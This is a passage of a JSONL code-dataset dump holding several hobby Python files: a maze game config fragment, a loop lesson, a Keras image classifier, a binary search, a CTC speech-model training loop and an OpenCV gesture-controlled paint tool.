elif name == 'filled_bucket':\n play_area_effects = (Effect.remove_object('shrubbery'),\n Effect.remove_object('fire'))\n return [Use('You put out the fire. The shrubbery has been burned down.',\n ('fire',), (Effect.remove_item('filled_bucket'),),\n play_area_effects)]\n elif name == 'matches':\n return [\n Use('You burn the well-loved doll to ashes. 
You monster.',\n ('doll',), play_area_effects=(Effect.remove_object('doll'),)),\n Use('Your way is now blocked by a flaming shrubbery.',\n ('shrubbery',), (Effect.remove_item('matches'),),\n (Effect.add_object('fire'),))]\n else:\n raise NotImplementedError(f'Used {name}')\n\n\n_CUSTOM_CONFIG = {\n 'tree_peach': _Config(squares={(0, 0), (-1, 0), (-1, 1)}),\n 'fishing_rod': _Config(squares={(1, 2), (1, 3)}),\n 'cake': _Config(squares={(2, 1), (3, 1)}),\n 'invisible_wall': _Config(squares=Squares.ALL),\n 'shrubbery': _Config(squares={(3, 1), (4, 1)}),\n 'fire': _Config(squares={(3, 1), (4, 1)}),\n 'puzzle_door': _Config(squares={(2, 3), (2, 4)}, inflation=(360, 175)),\n 'puzzle_slot_L': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_O': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_V': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_E': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n}\n\n\nfor block_char, slot_char in itertools.product('LOVE', repeat=2):\n inflate_x = 840 if slot_char in 'LE' else 600\n _CUSTOM_CONFIG[f'slotted_block_{block_char}_in_{slot_char}'] = _Config(\n squares={(2, 3), (2, 4)}, inflation=(inflate_x, 100))\ndel block_char, slot_char, inflate_x\n\n\ndef config(name, attr):\n return getattr(_CUSTOM_CONFIG.get(name, _Config.DEFAULT), attr)\n","repo_name":"rchen152/maze","sub_path":"src/maze/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"21546684642","text":"# i = 1\n# while i <= 10:\n# print(i, end=' | ')\n# i +=1 # Тоже самое i = i + 1\n\n# sep=\"\" : Строка, которой следует разделить объекты. None — использовать значение по умолчанию. Ожидается, что аргумент будет передан по имени.\n# end=\\n : Строка, которой следует поставить после всех объектов. None — использовать значение по умолчанию. Ожидается, что аргумент будет передан по имени.\n\n# print('Hello', 'World', sep=' ', end=' ')\n# print('Hello2', 'World2')\n\n# s = 'Hello world'\n# for l in s:\n# if l == ' ':\n# continue\n# print(f'\"{l}\"', end=' ')\n\nfor i in 'Hello world':\n if i == ' ':\n break\n print(i, end=' ')\nelse:\n print('\\nНет пробелов')\n\n","repo_name":"Oshpara/Python2","sub_path":"lesson13.py","file_name":"lesson13.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39245711807","text":"from keras.models import Sequential\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nimport image_tools\nfrom scipy import misc\nimport os\nimport logger\n\ndef create_model(input_shape):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), input_shape=input_shape))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dropout(0.1))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n return model\n\n#binary_crossentropy\ndef TrainNN(train_data_dir, validation_data_dir, model_name, img_width = 150, img_height = 150,nb_train_samples = 1000,nb_validation_samples = 300,\n epochs = 35,batch_size = 10):\n img_width, img_height = img_width, img_height\n train_data_dir = train_data_dir\n validation_data_dir = validation_data_dir\n nb_train_samples = nb_train_samples\n nb_validation_samples = nb_validation_samples\n epochs = epochs\n batch_size = batch_size\n\n if K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\n else:\n input_shape = (img_width, img_height, 3)\n\n model = create_model(input_shape = input_shape)\n\n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples / batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples)\n\n model.save_weights(model_name)\n\n\n\ntrain_data_dir = 'D:\\\\Img_base\\\\Classes\\\\Good_datasets\\\\Data\\\\train'\nvalidation_data_dir = 'D:\\\\Img_base\\\\Classes\\\\Good_datasets\\\\Data\\\\validation'\nweights_path= 'E:\\\\Master_G\\\\Moduls\\\\blonde_35_10_512.h5'\n\ncheck_folder = 'D:\\\\Img_base\\\\Scraping'\njunk_folder = 'D:\\\\Img_base\\\\Scraping_junk'\ncheck_folder_fin = 'D:\\\\Img_base\\\\Scraping\\\\folder'\n\n#train NN\nTrainNN(train_data_dir,validation_data_dir, \"test1000.h5\" )\n'''\nimg_width, img_height = 150, 150\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = create_model(input_shape)\nmodel.load_weights(weights_path)\n\n'''\n\n'''\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\ncheck_generator = test_datagen.flow_from_directory(\n check_folder,\n target_size=(img_width, img_height),\n batch_size=1,\n class_mode='binary')\n'''\n#output = model.predict_generator(check_generator, steps = 1, max_queue_size=96,workers=1,use_multiprocessing=False, verbose=0)\n#x = image_tools.readImagesAsNumpyArrays(check_folder_fin,150, 150)\n#for item in x:\n# output = model.predict_on_batch(item)\n# print(output)\n\n\n'''\nfiles = os.listdir(check_folder_fin)\nfor file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(check_folder_fin, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n output = model.predict_on_batch(img)\n print(file)\n print(output)\n\n'''\n\n'''\ncounter_a = 0\ncounter_b = 0\nfiles = os.listdir(check_folder_fin)\nfor file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(check_folder_fin, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n output = model.predict_on_batch(img)\n if(output < 0.3):\n counter_a = counter_a + 1\n elif(output > 0.8):\n counter_b = counter_b + 1\nprint(\"counter_a: \")\nprint(counter_a)\nprint(\"counter_b: \")\nprint(counter_b) \n\n#Return list a with true prediction, b - false prediction and c - with idk prediction\ndef ValidateFolderByNNBinary(theModel ,target_folder, threshold_low, threshold_high, img_height = 150, img_width = 150):\n list_a = list()\n list_b = list()\n list_c = list()\n try:\n files = os.listdir(target_folder)\n for file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(target_folder, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n #output = model.predict_on_batch(img)\n output = theModel.predict_on_batch(img)\n if(output <= threshold_low):\n #true\n list_a.append(path)\n elif(output >= threshold_high):\n #false\n list_b.append(path)\n #idk\n else:\n list_c.append(path)\n except Exception as ex:\n logger.LogFromTread(ex.args,'error.log')\n return list_a, list_b, list_c\n\n'''","repo_name":"Vital95/Image-scraping-neural-network","sub_path":"keras_usage.py","file_name":"keras_usage.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21238456294","text":"def binary_search(array, target, start, end):\n while start <= end:\n mid=(start+end)//2\n if array[mid]==target:\n return mid\n elif array[mid]>target:\n end= mid-1\n else:\n start= mid+1\n return None #while loop 나올 때까지 return 없으면 그냥 찾는 값이 없는 경우\nn, target=list(map(int, input().split()))\narray= list(map(int,input().split()))\n\nresult=binary_search(array, target, 0, n-1)\nif result==None:\n print('찾는 값이 없음')\nelse:\n print(result+1)","repo_name":"ParkIsComing/codingTest","sub_path":"BinarySearch/BinarySearch_Iteration.py","file_name":"BinarySearch_Iteration.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41295211964","text":"# from model import Net\nfrom cProfile import label\nfrom infer import phonetic_embedding\nfrom transformers import Wav2Vec2ForCTC, Wav2Vec2Processor\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom phonetic_encoder import Phonetic_encoder\nfrom acoustic_encoder import Acoustic_encoder\nfrom linguistic_encoder import Linguistic_encoder\nfrom char_embedding import text_to_tensor\nfrom help import wav_norm, Atention\nimport numpy as np\n# from help import beam_search_decoding\nfrom model import Acoustic_Phonetic_Linguistic\nfrom dataloader import MDD_Dataset\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\ntokenizer = Wav2Vec2Processor.from_pretrained(\"pretrained_finetuned\")\n\n\"\"\"\n\"\"\"\nf = open(\"/home/tuht/train_wav2vec/loss.txt\", 'a')\ndata = MDD_Dataset()\nprint(data)\nnet = Acoustic_Phonetic_Linguistic()\nnet.to('cuda')\n\nnet = torch.load('/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_AdamW_16head_PL.pth')\n# net = net.to('cpu')\ntrain_loader = DataLoader(dataset=data,\n batch_size=1,\n shuffle=True,\n num_workers=0)\n\n\n\n# convert to an iterator and look at one random sample\n\n\nctc_loss = nn.CTCLoss(blank = 95)\n# optimizer = optim.SGD(net.parameters(), lr=0.00001, momentum=0.9)\noptimizer = optim.AdamW(net.parameters(), lr = 0.000001)\n# optimizer = optim.SGD(net.parameters(), 0.01, momentum = 0.9)\n# optimizer = torch.load('/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_optim.pth')\nfor epoch in range(15): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(train_loader):\n acoustic, phonetic, linguistic, labels = data\n acoustic = acoustic.to('cuda')\n phonetic = phonetic.to('cuda')\n linguistic = linguistic.to('cuda')\n labels = labels.to('cuda')\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(acoustic, phonetic, linguistic)\n outputs = outputs.unsqueeze(1)\n input_lengths = outputs.shape\n target_lengths = labels.shape\n target = labels\n input_lengths = [input_lengths[0]]\n target_lengths =[target_lengths[1]]\n input_lengths = torch.tensor(input_lengths)\n target_lengths = torch.tensor(target_lengths)\n outputs = (F.log_softmax(outputs, dim=2))\n loss = ctc_loss(outputs, labels, input_lengths, target_lengths)\n print(loss)\n f.write(\"(\" +str(epoch+5) + \",\" + str(i) + \")\" + \" loss: \" + str(loss) + \"\\n\") \n loss.backward()\n optimizer.step()\n \n torch.save(net, '/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_AdamW_16head_PL.pth')\n # torch.save(optimizer, '/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_optim_Adam.pth')\n \nprint('Finished Training')\n","repo_name":"huutuongtu/Deep_Learning_Project","sub_path":"PL/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6202999802","text":"import tkinter as tk\r\nimport cv2\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nclassifier = load_model(r'E:\\OMKARS\\OMKARS1\\PROJECTS\\PAINT_TOOOL\\complete_code\\SignR_model.h5')\r\nbasepath='E:/OMKARS/OMKARS1/PROJECTS/PAINT_TOOOL/complete_code'\r\n\r\n\r\nwindow=tk.Tk()\r\nfilename = tk.PhotoImage(file = \"E:/OMKARS/OMKARS1/PROJECTS/PAINT_TOOOL/complete_code/paint_sym1.png\")\r\nbackground_label = tk.Label(window, image=filename)\r\nbackground_label.place( relwidth=1, relheight=1)\r\n\r\nwindow.configure(background='white')\r\nw, h = window.winfo_screenwidth(), window.winfo_screenheight()\r\nwindow.geometry(\"%dx%d+0+0\" % (w, h))\r\n#window.grid_rowconfigure(0, weight=1)\r\n#window.grid_columnconfigure(0, weight=1)\r\n\r\nmessage = tk.Label(window, text=\"_\"*9+\"Real Time Paint Tool Box\"+\"_\"*9, bg=\"black\", fg=\"white\", width=100, height=2,\r\n font=(\"Tempus Sans ITC\",19,\"bold\"))\r\n\r\nmessage.place(x=0, y=0)\r\n\r\ndef sign_recognize():\r\n\r\n \r\n classifier = load_model(basepath + '/SignR_model.h5')\r\n\r\n def predictor():\r\n import numpy as np\r\n from keras.preprocessing import image\r\n test_image = image.load_img(basepath + '/1.png', target_size=(64, 64))\r\n test_image = image.img_to_array(test_image)\r\n test_image = np.expand_dims(test_image, axis = 0)\r\n result = classifier.predict(test_image)\r\n \r\n if result[0][0] == 1:\r\n return 'A'\r\n elif result[0][1] == 1:\r\n return 'B'\r\n elif result[0][2] == 1:\r\n return 'C'\r\n elif result[0][3] == 1:\r\n return 'D'\r\n elif result[0][4] == 1:\r\n return 'E'\r\n \r\n cam = cv2.VideoCapture(0)\r\n# update_label(\"Press << c >> for Gesture Detection with Voice\")\r\n\r\n img_text = ''\r\n while True:\r\n ret, frame = cam.read()\r\n frame = cv2.flip(frame,1)\r\n# update_label(\"Press << c >> for Gesture Detection with Voice\")\r\n\r\n l_h = 0\r\n l_s = 0\r\n l_v = 0\r\n u_h = 179 \r\n u_s = 255\r\n u_v = 152 \r\n \r\n img = cv2.rectangle(frame, (425,100),(625,300), (0,255,0), thickness=2, lineType=8, shift=0)\r\n \r\n lower_blue = np.array([l_h, l_s, l_v])\r\n upper_blue = np.array([u_h, u_s, u_v])\r\n imcrop = img[102:298, 427:623]\r\n hsv = cv2.cvtColor(imcrop, cv2.COLOR_BGR2HSV)\r\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\r\n \r\n cv2.putText(frame, img_text, (30, 400), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0, 255, 0))\r\n paint_win = np.zeros((400, 500, 3), np.uint8) \r\n paint_win.fill(255)\r\n if img_text=='A':\r\n cv2.rectangle(frame,(30,30),(400,400),(255,0,0),2)\r\n cv2.rectangle(paint_win,(30,30),(400,400),(255,0,0),2)\r\n if img_text=='B':\r\n cv2.circle(img,(300,300),100,(0,250,200))\r\n cv2.circle(paint_win,(300,300),100,(0,250,200))\r\n if img_text=='C':\r\n cv2.line(img,(100,100),(400,400),(0,0,2550))\r\n cv2.line(paint_win,(100,100),(400,400),(0,0,2550))\r\n if img_text=='D':\r\n cv2.ellipse(img,(256,256),(100,50),0,0,180,255,-1)\r\n cv2.ellipse(paint_win,(256,256),(100,50),0,0,180,255,-1)\r\n if img_text=='E':\r\n p1 = (100, 200) \r\n p2 = (50, 50) \r\n p3 = (300, 100) \r\n \r\n # Drawing the triangle with the help of lines \r\n # on the black window With given points \r\n # cv2.line is the inbuilt function in opencv library \r\n cv2.line(img, p1, p2, (255, 0, 0), 3) \r\n cv2.line(paint_win, p1, p2, (255, 0, 0), 3) \r\n cv2.line(img, p2, p3, (255, 0, 0), 3) \r\n cv2.line(paint_win, p2, p3, (255, 0, 0), 3) \r\n cv2.line(img, p1, p3, (255, 0, 0), 3)\r\n cv2.line(paint_win, p1, p3, (255, 0, 0), 3)\r\n\r\n cv2.imshow(\"Sign Capture Window\", 
frame)\r\n        cv2.imshow(\"Silhouettes Image\", mask)\r\n        cv2.imshow(\"image\", paint_win)\r\n        #cv2.waitKey(0)\r\n        #if cv2.waitKey(1) == ord('c'):\r\n\r\n        img_name = basepath + \"/1.png\"\r\n        save_img = cv2.resize(mask, (64, 64))\r\n        cv2.imwrite(img_name, save_img)\r\n        # print(\"{} written!\".format(img_name))\r\n        img_text = predictor()\r\n        # speak.Speak(img_text)\r\n\r\n        if cv2.waitKey(1) == ord('c'):\r\n            img_text = predictor()\r\n\r\n        if cv2.waitKey(1) == 27:\r\n            cam.release()\r\n            cv2.destroyAllWindows()\r\n            break\r\n\r\n\r\ndef colour():\r\n    import numpy as np\r\n    import cv2\r\n    from collections import deque\r\n\r\n    # Define the upper and lower boundaries for a color to be considered \"Blue\"\r\n    blueLower = np.array([100, 60, 60])\r\n    blueUpper = np.array([140, 255, 255])\r\n    #skin =np.array([231,158,109])\r\n\r\n    # Define a 5x5 kernel for erosion and dilation\r\n    kernel = np.ones((5, 5), np.uint8)\r\n\r\n    # Setup deques to store separate colors in separate arrays\r\n    bpoints = [deque(maxlen=512)]\r\n    gpoints = [deque(maxlen=512)]\r\n    rpoints = [deque(maxlen=512)]\r\n    ypoints = [deque(maxlen=512)]\r\n    opoints = [deque(maxlen=512)]\r\n    vpoints = [deque(maxlen=512)]\r\n    ipoints = [deque(maxlen=512)]\r\n    bindex = 0\r\n    gindex = 0\r\n    rindex = 0\r\n    yindex = 0\r\n    oindex = 0\r\n    vindex = 0\r\n    iindex = 0\r\n\r\n    colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255), (255, 165, 0), (238, 130, 238), (75, 0, 130)]\r\n\r\n    colorIndex = 0\r\n\r\n    # Setup the Paint interface\r\n    paintWindow = np.zeros((471, 636, 3)) + 255\r\n    paintWindow = cv2.rectangle(paintWindow, (40, 1), (140, 65), (0, 0, 0), 2)\r\n    paintWindow = cv2.rectangle(paintWindow, (160, 1), (255, 65), colors[0], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (275, 1), (370, 65), colors[1], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (390, 1), (485, 65), colors[2], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (505, 1), (600, 65), colors[3], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (620, 1), (715, 65), colors[4], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (735, 1), (830, 65), colors[5], -1)\r\n    paintWindow = cv2.rectangle(paintWindow, (850, 1), (945, 65), colors[6], -1)\r\n    cv2.putText(paintWindow, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"ORANGE\", (640, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165, 0), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"VIOLET\", (762, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165, 0), 2, cv2.LINE_AA)\r\n    cv2.putText(paintWindow, \"INDIGO\", (882, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165, 0), 2, cv2.LINE_AA)\r\n    cv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)\r\n\r\n    # Load the video\r\n    camera = cv2.VideoCapture(0)\r\n\r\n    # Keep looping\r\n    while True:\r\n        # Grab the current paintWindow\r\n        (grabbed, frame) = camera.read()\r\n        frame = cv2.flip(frame, 1)\r\n        hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n        # Add the coloring options to the frame\r\n        frame = cv2.rectangle(frame, (40, 1), (140, 65), (122, 122, 122), -1)\r\n        frame = cv2.rectangle(frame, (160, 1), (255, 65), colors[0], -1)\r\n        frame = cv2.rectangle(frame, (275, 1), (370, 65), colors[1], -1)\r\n        frame = cv2.rectangle(frame, (390, 1), (485, 65), colors[2], -1)\r\n        frame = cv2.rectangle(frame, (505, 1), (600, 65), colors[3], -1)\r\n        frame = cv2.rectangle(frame, (620, 1), (715, 65), colors[4], -1)\r\n        frame = cv2.rectangle(frame, (735, 1), (830, 65), colors[5], -1)\r\n        frame = cv2.rectangle(frame, (850, 1), (945, 65), colors[6], -1)\r\n        cv2.putText(frame, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"ORANGE\", (640, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"VIOLET\", (762, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n        cv2.putText(frame, \"INDIGO\", (882, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n        # Check to see if we have reached the end of the video\r\n        if not grabbed:\r\n            break\r\n\r\n        # Determine which pixels fall within the blue boundaries and then blur the binary image\r\n        blueMask = cv2.inRange(hsv, blueLower, blueUpper)\r\n        blueMask = cv2.erode(blueMask, kernel, iterations=2)\r\n        blueMask = cv2.morphologyEx(blueMask, cv2.MORPH_OPEN, kernel)\r\n        blueMask = cv2.dilate(blueMask, kernel, iterations=1)\r\n\r\n        # Find contours in the image\r\n        (ret, cnts, _) = cv2.findContours(blueMask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n        center = None\r\n\r\n        # Check to see if any contours were found\r\n        if len(cnts) > 0:\r\n            # Sort the contours and find the largest one -- we\r\n            # will assume this contour corresponds to the area of the bottle cap\r\n            cnt = sorted(cnts, key=cv2.contourArea, reverse=True)[0]\r\n            # Get the radius of the enclosing circle around the found contour\r\n            ((x, y), radius) = cv2.minEnclosingCircle(cnt)\r\n            # Draw the circle around the contour\r\n            cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)\r\n            # Get the moments to calculate the center of the contour (in this case Circle)\r\n            M = cv2.moments(cnt)\r\n            center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\r\n\r\n            if center[1] <= 65:\r\n                if 40 <= center[0] <= 140: # Clear All\r\n                    bpoints = [deque(maxlen=512)]\r\n                    gpoints = [deque(maxlen=512)]\r\n                    rpoints = [deque(maxlen=512)]\r\n                    ypoints = [deque(maxlen=512)]\r\n                    opoints = [deque(maxlen=512)]\r\n                    vpoints = [deque(maxlen=512)]\r\n                    ipoints = [deque(maxlen=512)]\r\n                    bindex = 0\r\n                    gindex = 0\r\n                    rindex = 0\r\n                    yindex = 0\r\n                    oindex = 0\r\n                    vindex = 0\r\n                    iindex = 0\r\n\r\n                    paintWindow[67:, :, :] = 255\r\n                elif 160 <= center[0] <= 255:\r\n                    colorIndex = 0 # Blue\r\n                elif 275 <= center[0] <= 370:\r\n                    colorIndex = 1 # Green\r\n                elif 390 <= center[0] <= 485:\r\n                    colorIndex = 2 # Red\r\n                elif 505 <= center[0] <= 600:\r\n                    colorIndex = 3 # Yellow\r\n                elif 620 <= center[0] <= 715:\r\n                    colorIndex = 4 # Orange\r\n                elif 735 <= center[0] <= 830:\r\n                    colorIndex = 5 # Violet\r\n                elif 850 <= center[0] <= 945:\r\n                    colorIndex = 6 # Indigo\r\n            else:\r\n                if colorIndex == 0:\r\n                    bpoints[bindex].appendleft(center)\r\n                elif colorIndex == 1:\r\n                    gpoints[gindex].appendleft(center)\r\n                elif colorIndex == 2:\r\n                    rpoints[rindex].appendleft(center)\r\n                elif colorIndex == 3:\r\n                    ypoints[yindex].appendleft(center)\r\n                elif colorIndex == 4:\r\n                    opoints[oindex].appendleft(center)\r\n                elif colorIndex == 5:\r\n                    vpoints[vindex].appendleft(center)\r\n                elif colorIndex == 6:\r\n                    ipoints[iindex].appendleft(center)\r\n        # Append the next deque when no contours are detected (i.e., bottle cap reversed)\r\n        else:\r\n            bpoints.append(deque(maxlen=512))\r\n            bindex += 1\r\n            gpoints.append(deque(maxlen=512))\r\n            gindex += 1\r\n            rpoints.append(deque(maxlen=512))\r\n            rindex += 1\r\n            ypoints.append(deque(maxlen=512))\r\n            yindex += 1\r\n            opoints.append(deque(maxlen=512))\r\n            oindex += 1\r\n            vpoints.append(deque(maxlen=512))\r\n            vindex += 1\r\n            ipoints.append(deque(maxlen=512))\r\n            iindex += 1\r\n\r\n        # Draw lines of all the colors (Blue, Green, Red and Yellow)\r\n        points = [bpoints, gpoints, rpoints, ypoints, opoints, vpoints, ipoints]\r\n        for i in range(len(points)):\r\n            for j in range(len(points[i])):\r\n                for k in range(1, len(points[i][j])):\r\n                    if points[i][j][k - 1] is None or points[i][j][k] is None:\r\n                        continue\r\n                    cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\r\n                    cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 2)\r\n\r\n        # Show the frame and the paintWindow image\r\n        cv2.imshow(\"Tracking\", frame)\r\n        cv2.imshow(\"Paint\", paintWindow)\r\n\r\n        # If the 'q' key is pressed, stop the loop\r\n        if cv2.waitKey(1) & 0xFF == ord(\"q\"):\r\n            camera.release()\r\n            break\r\n\r\n    # Cleanup the camera and close any open windows\r\n    camera.release()\r\n    cv2.destroyAllWindows()\r\n\r\n\r\ndef Write():\r\n    from subprocess import call\r\n    call([\"python\", \"Write.py\"])\r\n\r\n\r\ndef new_rec():\r\n    # Python3 program to draw rectangle\r\n    # shape on solid image\r\n    import numpy as np\r\n    import cv2\r\n\r\n    # Creating a black image with 3\r\n    # channels RGB and unsigned int datatype\r\n    img = np.zeros((400, 400, 3), dtype=\"uint8\")\r\n\r\n    # Creating rectangle\r\n    cv2.rectangle(img, (60, 30), (300, 200), (255, 255, 255), 5)\r\n\r\n    cv2.imshow('dark', img)\r\n\r\n    # Allows us to see image\r\n    # until closed forcefully\r\n    cv2.waitKey(0)\r\n    cv2.destroyAllWindows()\r\n\r\nShape = tk.Label(window, text=\"--SHAPES--\", fg=\"black\", bg=\"cyan\", width=20, height=2,\r\n                 font=(\"Tempus Sans ITC\", 15, \"bold\"))\r\nShape.place(x=130, y=200)\r\n\r\n\r\nshape = tk.Button(window, text=\"Shape\", command=sign_recognize, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n                  font=(\"Tempus Sans ITC\", 15, \"bold\"))\r\nshape.place(x=1000, y=600)\r\n\r\nOps = tk.Label(window, text=\"--OPERATIONS--\", fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n               font=(\"Tempus Sans ITC\", 17, \"bold\"))\r\nOps.place(x=965, y=200)\r\n\r\ncolour = tk.Button(window, text=\"Colour\", command=colour, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n                   font=(\"Tempus Sans ITC\", 15, \"bold\"))\r\ncolour.place(x=1000, y=300)\r\n\r\n\r\nWrite = tk.Button(window, text=\"Write\", command=Write, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n                  font=(\"Tempus Sans ITC\", 15, \"bold\"))\r\nWrite.place(x=1000, 
y=500)\r\n\r\n\r\n\r\nwindow.mainloop()","repo_name":"priyankawadle/Real_Time_PaintTool_Box","sub_path":"Paint.py","file_name":"Paint.py","file_ext":"py","file_size_in_byte":15629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
